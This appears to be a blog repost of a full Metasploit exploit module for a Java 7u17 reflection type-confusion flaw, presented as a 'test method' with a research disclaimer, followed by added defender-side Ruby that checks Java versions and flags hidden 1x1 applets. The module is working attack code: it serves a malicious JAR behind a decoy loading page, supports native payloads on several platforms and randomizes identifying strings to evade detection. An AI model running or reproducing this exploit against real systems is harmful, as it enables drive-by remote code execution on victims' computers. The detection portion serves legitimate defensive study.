  • Java Applet Reflection Type Confusion Remote Code Execution

    Test method:

    The program (method) provided may be offensive in nature and is intended for security research and teaching only; use at your own risk!
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require 'msf/core'
    require 'rex'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpServer::HTML
      include Msf::Exploit::EXE

      include Msf::Exploit::Remote::BrowserAutopwn
      autopwn_info({:javascript => false})

      def initialize(info = {})
        super(update_info(info,
          'Name'        => 'Java Applet Reflection Type Confusion Remote Code Execution',
          'Description' => %q{
            This module abuses Java Reflection to generate a Type Confusion, due to a weak
            access control when setting final fields on static classes, and run code outside of
            the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This
            exploit doesn't bypass click-to-play, so the user must accept the java warning in
            order to run the malicious applet.
          },
          'License'     => MSF_LICENSE,
          'Author'      =>
            [
              'Jeroen Frijters', # Vulnerability discovery and PoC
              'juan vazquez'     # Metasploit module
            ],
          'References'  =>
            [
              [ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
              [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html' ]
            ],
          'Platform'    => ['java', 'win', 'osx', 'linux'],
          'Payload'     => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
          'Targets'     =>
            [
              [ 'Generic (Java Payload)',
                {
                  'Platform' => ['java'],
                  'Arch'     => ARCH_JAVA,
                }
              ],
              [ 'Windows x86 (Native Payload)',
                {
                  'Platform' => 'win',
                  'Arch'     => ARCH_X86,
                }
              ],
              [ 'Mac OS X x86 (Native Payload)',
                {
                  'Platform' => 'osx',
                  'Arch'     => ARCH_X86,
                }
              ],
              [ 'Linux x86 (Native Payload)',
                {
                  'Platform' => 'linux',
                  'Arch'     => ARCH_X86,
                }
              ],
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Jan 10 2013'
        ))
      end

      # Load the precompiled applet classes shipped with the framework and
      # randomize the name of the main exploit class before serving it.
      def setup
        path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Exploit.class")
        @exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
        path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Union1.class")
        @union1_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
        path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Union2.class")
        @union2_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
        path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "SystemClass.class")
        @system_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

        @exploit_class_name = rand_text_alpha("Exploit".length)
        @exploit_class.gsub!("Exploit", @exploit_class_name)
        super
      end

      # Serve the JAR on any *.jar request, the applet page on the resource
      # root, and redirect everything else to the root.
      def on_request_uri(cli, request)
        print_status("handling request for #{request.uri}")

        case request.uri
        when /\.jar$/i
          jar = payload.encoded_jar
          jar.add_file("#{@exploit_class_name}.class", @exploit_class)
          jar.add_file("Union1.class", @union1_class)
          jar.add_file("Union2.class", @union2_class)
          jar.add_file("SystemClass.class", @system_class)
          # Rename well-known strings in entry names and contents
          metasploit_str = rand_text_alpha("metasploit".length)
          payload_str = rand_text_alpha("payload".length)
          jar.entries.each { |entry|
            entry.name.gsub!("metasploit", metasploit_str)
            entry.name.gsub!("Payload", payload_str)
            entry.data = entry.data.gsub("metasploit", metasploit_str)
            entry.data = entry.data.gsub("Payload", payload_str)
          }
          jar.build_manifest

          send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
        when /\/$/
          payload = regenerate_payload(cli)
          if not payload
            print_error("Failed to generate the payload.")
            send_not_found(cli)
            return
          end
          send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
        else
          send_redirect(cli, get_resource() + '/', '')
        end

      end

      # Minimal landing page embedding a 1x1 applet that loads the JAR.
      def generate_html
        html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
        html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
        html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
        html += %Q|</applet></body></html>|
        return html
      end

    end
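    The module's description and its generate_html method give a defender two concrete things to check for: a Java runtime at 7u17 or earlier (the affected range stated above), and a served page carrying a hidden 1x1 applet whose archive is a .jar. The Ruby below is an added example and is not part of the Metasploit module or the original post; the function names parse_java_version, affected_by_jre7u17_type_confusion? and suspicious_applets are assumptions, and the SAMPLE_HTML input is constructed to mirror the shape of the page the module serves.

```ruby
# Added example (not from the Metasploit module above): defender-side checks
# derived from the module's own description and HTML template.

# Parse a legacy java.version string such as "1.7.0_17" into
# [major, minor, update]. Returns nil for formats it does not understand
# (e.g. "11.0.2" style strings from newer runtimes), so callers can tell
# "not affected" apart from "could not decide".
def parse_java_version(str)
  m = str.to_s.strip.match(/\A1\.(\d+)\.(\d+)(?:_(\d+))?/)
  return nil unless m
  [m[1].to_i, m[2].to_i, (m[3] || 0).to_i]
end

# The module states the vulnerability affects Java 7u17 and earlier; this
# constant is that upper bound expressed as [major, minor, update].
AFFECTED_MAX = [7, 0, 17].freeze

# true  -> version is within the stated affected range
# false -> version is newer than 7u17
# nil   -> version string could not be parsed
def affected_by_jre7u17_type_confusion?(version_str)
  v = parse_java_version(version_str)
  return nil if v.nil?
  (v <=> AFFECTED_MAX) <= 0
end

# --- HTML heuristic: hidden applet pulling a .jar ---------------------------

APPLET_TAG = /<applet\b([^>]*)>/i

# Pull a double-quoted attribute value out of an applet tag's attribute list.
def applet_attr(attrs, name)
  m = attrs.match(/\b#{Regexp.escape(name)}\s*=\s*"([^"]*)"/i)
  m && m[1]
end

# Return one finding per <applet> element that is both effectively invisible
# (width and height at most 1) and loads a .jar archive. Visible applets or
# applets without a .jar archive are left out.
def suspicious_applets(html)
  findings = []
  html.scan(APPLET_TAG).each do |(attrs)|
    archive = applet_attr(attrs, "archive")
    code    = applet_attr(attrs, "code")
    width   = applet_attr(attrs, "width").to_i
    height  = applet_attr(attrs, "height").to_i

    hidden  = width <= 1 && height <= 1
    is_jar  = !archive.nil? && archive =~ /\.jar\z/i
    next unless hidden && is_jar

    findings << { archive: archive, code: code, width: width, height: height }
  end
  findings
end

# Constructed sample: the first applet mirrors the module's template
# (random 8-letter .jar name, randomized class name, 1x1 size); the second
# is an ordinary visible applet that should not be flagged.
SAMPLE_HTML = <<~HTML
  <html><head><title>Loading, Please Wait...</title></head>
  <body><center><p>Loading, Please Wait...</p></center>
  <applet archive="qwertyui.jar" code="Xqzlpwa.class" width="1" height="1"></applet>
  <applet archive="game.jar" code="Game.class" width="640" height="480"></applet>
  </body></html>
HTML

if __FILE__ == $0
  %w[1.7.0_17 1.7.0_21 1.6.0_45 11.0.2].each do |v|
    puts "#{v}: affected=#{affected_by_jre7u17_type_confusion?(v).inspect}"
  end
  suspicious_applets(SAMPLE_HTML).each do |f|
    puts "hidden jar applet: archive=#{f[:archive]} code=#{f[:code]}"
  end
end
```

    The version check deliberately follows the module's wording literally ("7u17 and earlier"), so a 1.6.x string is reported as affected too; if your inventory only needs the Java 7 line, tighten it to major == 7. The applet heuristic is a screening signal for proxy or mail-gateway logs, not proof of exploitation: a tiny applet loading a .jar is exactly what this module serves, but a legitimate page can look the same.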
  • Original article: https://www.cnblogs.com/security4399/p/3043667.html